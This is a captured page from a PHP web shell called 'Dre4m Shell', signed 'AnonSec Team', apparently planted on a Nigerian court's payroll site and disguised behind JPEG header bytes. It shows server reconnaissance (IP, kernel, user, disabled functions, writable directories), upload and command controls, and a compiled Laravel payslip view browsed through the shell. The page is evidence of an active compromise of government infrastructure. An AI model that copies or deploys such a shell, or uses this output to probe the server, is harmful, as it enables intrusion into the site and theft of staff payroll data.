ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.149.237.89
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/9760b1b40ddabce48ad31e345b299cf198993017.php
<?php $__env->startSection('pageTitle'); ?>
    Pay Slip
<?php $__env->stopSection(); ?>
<?php $__env->startSection('content'); ?>
    <form method="post" action="<?php echo e(url('/cpo-unit')); ?>">
        <div class="box-body" style="background:#FFF;">
            <div class="row">
                <div class="col-md-12">
                    <!--1st col-->
                    <?php if(count($errors) > 0): ?>
                        <div class="alert alert-danger alert-dismissible" role="alert">
                            <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span
                                    aria-hidden="true">&times;</span>
                            </button>
                            <strong>Error!</strong>
                            <?php $__currentLoopData = $errors->all(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $error): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                <p><?php echo e($error); ?></p>
                            <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                        </div>
                    <?php endif; ?>
                    <?php if(session('message')): ?>
                        <div class="alert alert-success alert-dismissible" role="alert">
                            <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span
                                    aria-hidden="true">&times;</span>
                            </button>
                            <strong>Success!</strong>
                            <?php echo e(session('message')); ?>

                        </div>
                    <?php endif; ?>
                    <?php if(session('error')): ?>
                        <div class="alert alert-danger alert-dismissible" role="alert">
                            <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span
                                    aria-hidden="true">&times;</span>
                            </button>
                            <strong>Error!</strong>
                            <?php echo e(session('error')); ?>

                        </div>
                    <?php endif; ?>
                </div>
                <?php echo e(csrf_field()); ?>

                <div class="col-md-12">
                    <!--2nd col-->
                    <h4 class="" style="text-transform:uppercase">CPO</h4>
                    <div class="row">
                    </div>

                    
                        <div class="row">

                            <div class="col-md-6">
                                <div class="form-group">
                                    <label>Select a Year</label>
                                    <select name="year" id="section" class="form-control input-sm">
                                        <option value="">Select Year </option>
                                        
                                        <?php for($i=2010;$i<=2040;$i++): ?>
                                            <option value="<?php echo e($i); ?>" <?php if(($activeMonth !== '') && $activeMonth->year == $i): ?> selected <?php elseif($year == $i): ?> selected <?php endif; ?>><?php echo e($i); ?></option>
                                        <?php endfor; ?>
                                        
                                      </select>
                                </div>
                            </div>
                            <div class="col-md-6">
                                <div class="form-group">
                                    <label> Select a month </label>
                                    <select name="month" id="section" class="form-control input-sm">

                                        <option value="">Select Month </option>
                                       
                                        <option value="JANUARY" <?php if(($activeMonth !== '') && $activeMonth->month == 'JANUARY'): ?> selected <?php elseif($month == 'JANUARY'): ?> selected <?php endif; ?>>January</option>
                                        <option value="FEBRUARY" <?php if(($activeMonth !== '') && $activeMonth->month == 'FEBRUARY'): ?> selected <?php elseif($month == 'FEBRUARY'): ?> selected <?php endif; ?>>February</option>
                                        <option value="MARCH" <?php if(($activeMonth !== '') && $activeMonth->month == 'MARCH'): ?> selected <?php elseif($month == 'MARCH'): ?> selected <?php endif; ?>>March</option>
                                        <option value="APRIL" <?php if(($activeMonth !== '') && $activeMonth->month == 'APRIL'): ?> selected <?php elseif($month == 'APRIL'): ?> selected <?php endif; ?>>April</option>
                                        <option value="MAY" <?php if(($activeMonth !== '') && $activeMonth->month == 'MAY'): ?> selected <?php elseif($month == 'MAY'): ?> selected <?php endif; ?>>May</option>
                                        <option value="JUNE" <?php if(($activeMonth !== '') && $activeMonth->month == 'JUNE'): ?> selected <?php elseif($month == 'JUNE'): ?> selected <?php endif; ?>>June</option>
                                        <option value="JULY" <?php if(($activeMonth !== '') && $activeMonth->month == 'JULY'): ?> selected <?php elseif($month == 'JULY'): ?> selected <?php endif; ?>>July</option>
                                        <option value="AUGUST" <?php if(($activeMonth !== '') && $activeMonth->month == 'AUGUST'): ?> selected <?php elseif($month == 'AUGUST'): ?> selected <?php endif; ?>>August</option>
                                        <option value="SEPTEMBER" <?php if(($activeMonth !== '') && $activeMonth->month == 'SEPTEMBER'): ?> selected <?php elseif($month == 'SEPTEMBER'): ?> selected <?php endif; ?>>September</option>
                                        <option value="OCTOBER" <?php if(($activeMonth !== '') && $activeMonth->month == 'OCTOBER'): ?> selected <?php elseif($month == 'OCTOBER'): ?> selected <?php endif; ?>>October</option>
                                        <option value="NOVEMBER" <?php if(($activeMonth !== '') && $activeMonth->month == 'NOVEMBER'): ?> selected <?php elseif($month == 'NOVEMBER'): ?> selected <?php endif; ?>>November</option>
                                        <option value="DECEMBER" <?php if(($activeMonth !== '') && $activeMonth->month == 'DECEMBER'): ?> selected <?php elseif($month == 'DECEMBER'): ?> selected <?php endif; ?>>December</option>
                                      </select>
                                </div>
                            </div>

                        </div>
                        <div class="col-md-12">
                            <div class="form-group">
                                <label for="sortcode"></label>
                                <div align="right">

                                    <button class="btn btn-success pull-right" name="fetchRecords" type="submit"> Display</button>
                                </div>
                            </div>
                        </div>
                    

                </div>
            </div>
            <br><br>
            <div class="table-responsive" style="font-size: 12px; padding:10px;">
                <table class="table table-bordered table-striped table-highlight">
                    <thead>
                        <tr bgcolor="#c7c7c7">
                            <th width="1%">S/N</th>
                            <th>Division</th>
                            <th>Stage</th>
                            <th>Action</th>
                        </tr>
                    </thead>
                    <?php $serialNum = 1; ?>

                    <?php if(count($salary) > 0): ?>
                    <?php $__currentLoopData = $salary; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $b): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                        <tr class="<?php echo e($b->vstage == 6 ? 'alert alert-success' : ''); ?>">
                            <td><?php echo e($serialNum++); ?> </td>
                            <td><?php echo e($b->division); ?></td>
                            <td><?php echo e($b->description); ?></td>
                            <td><a
                                    href="javascript: ViewPayroll('<?php echo e($b->divisionID); ?>','<?php echo e($b->year); ?>','<?php echo e($b->month); ?>')">View</a>
                            </td>
                        </tr>
                    <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                    <?php else: ?>
                        <tr>
                            <td colspan="4" class="text-center text-danger"> No Records found...</td>
                        </tr>
                    <?php endif; ?>

                </table>
            </div>
        </div><!-- /.col -->
        </div><!-- /.row -->
    </form>
    <div class="box-body">
        <div class="row">
            <div class="col-md-12">
                </br>
            </div>
            <form method="post" action="<?php echo e(url('con-payrollReport/create')); ?>" id="id-payroll" target="_blank">
                <?php echo e(csrf_field()); ?>

                <input type="hidden" id="id-court" name="court" value="9">
                <input type="hidden" id="id-division" name="division" value="<?php echo e(Auth::user()->divisionID); ?>">
                <input type="hidden" name="year" id="id-year">
                <input type="hidden" name="month" id="id-month">
            </form>

        <?php $__env->stopSection(); ?>
        <?php $__env->startSection('styles'); ?>
            <link rel="stylesheet" type="text/css" href="<?php echo e(asset('assets/css/datepicker.min.css')); ?>">
        <?php $__env->stopSection(); ?>
        <?php $__env->startSection('scripts'); ?>
            <script src="<?php echo e(asset('assets/js/jquery-ui.min.js')); ?>"></script>

            <script type="text/javascript">

                const Reload = (form) => document.forms[form].submit();

                const ViewPayroll = (division, year, month) => {
                    document.getElementById('id-division').value = division;
                    document.getElementById('id-year').value = year;
                    document.getElementById('id-month').value = month;
                    Reload('id-payroll');
                }
            </script>
        <?php $__env->stopSection(); ?>

<?php echo $__env->make('layouts.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/nicngo5/grp.nicn.gov.ng/resources/views/forwardApproval/cpoPage.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team